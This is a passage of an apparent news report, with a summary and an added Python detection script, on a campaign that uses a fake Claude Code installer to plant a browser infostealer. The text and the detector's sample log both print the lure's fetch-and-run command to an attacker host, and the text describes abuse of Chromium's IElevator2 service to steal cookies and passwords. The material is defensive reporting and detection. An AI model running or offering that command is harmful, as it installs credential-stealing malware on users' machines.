
"The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is 'irm https[:]//claude[.]ai/install.ps1 | iex', and the lure replaced the destination host with 'irm events[.]msft23[.]com | iex'."
"The payload is unique, and doesn't match up with any documented malware family. It does, however, wreak havoc on developers, exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera."
"The attack also abuses the IElevator2 COM interface. This is Chromium's elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords."
"It relies on developers searching for "install claude code," and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic's authentic installer - but as Ontinue's team found, the"
A campaign targets developers by using fake “one-line installer” lures that execute attacker-controlled commands. The lure imitates a legitimate Claude Code installer while redirecting to attacker infrastructure. The delivered payload is not tied to a known malware family and focuses on Chromium-based browsers. It exfiltrates decrypted cookies, passwords, and payment methods by abusing IElevator2, a Chromium elevation service used for App-Bound Encryption. Earlier cookie-stealing methods relied on copying SQLite databases, but the new approach leverages IElevator2 to bypass protections. The attack infrastructure uses multiple newly registered domains routed through Cloudflare and depends on developers searching for “install claude code” and clicking sponsored lookalike pages that download and run the authentic installer before malicious activity occurs.
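As an added example (not code from the article or from Ontinue), here is defender-side detection logic for the lure pattern described above: it recognises PowerShell download cradles of the `irm <url> | iex` shape in logged command lines and flags any whose host is not the expected installer host. The allowlist and the sample log lines are assumptions constructed for the demonstration; only claude.ai and the lure host come from the page.

```python
import re
from urllib.parse import urlparse

# Hosts the genuine one-line installer is fetched from. Assumption: a
# defender-maintained allowlist; claude.ai is the only legitimate host named.
EXPECTED_INSTALLER_HOSTS = {"claude.ai"}

# A "download cradle": a web request piped straight into Invoke-Expression,
# covering the short aliases (irm/iwr/iex) and their long forms.
CRADLE_RE = re.compile(
    r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\s+"
    r"['\"]?(?P<url>\S+?)['\"]?\s*\|\s*(?:iex|Invoke-Expression)\b",
    re.IGNORECASE,
)

def cradle_host(command):
    """Return the host a cradle in `command` fetches from, or None if no cradle."""
    m = CRADLE_RE.search(command)
    if not m:
        return None
    url = m.group("url")
    # The lure uses a bare host ("irm events.msft23.com | iex"); add a scheme
    # so urlparse can extract the hostname.
    if "://" not in url:
        url = "https://" + url
    host = urlparse(url).hostname
    return host.lower() if host else None

def classify(command):
    """'benign' (no cradle), 'expected' (allowlisted host) or 'suspicious'."""
    host = cradle_host(command)
    if host is None:
        return "benign"
    return "expected" if host in EXPECTED_INSTALLER_HOSTS else "suspicious"

def scan(lines):
    """Return (line_no, verdict, host) for every logged command that is a cradle."""
    return [(n, classify(c), cradle_host(c))
            for n, c in enumerate(lines, 1) if cradle_host(c) is not None]

# Constructed sample command lines (as PowerShell script-block logging would
# record them), not real telemetry: the genuine installer, the lure from the
# page, a long-form alias variant, and an unrelated command.
SAMPLE_LOG = [
    "irm https://claude.ai/install.ps1 | iex",
    "irm events.msft23.com | iex",
    "Invoke-RestMethod 'https://claude.ai/install.ps1' | Invoke-Expression",
    "Get-ChildItem C:\\Users",
]
```

Running `scan(SAMPLE_LOG)` flags line 2 as suspicious and lines 1 and 3 as expected; an unexpected host on a cradle that otherwise looks like the vendor's documented installer is the signal worth alerting on.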
#developer-targeted-infostealers #chromium-browser-data-theft #ielevator2-and-app-bound-encryption #malicious-installer-phishing #cloudflare-hosted-infrastructure
Read at theregister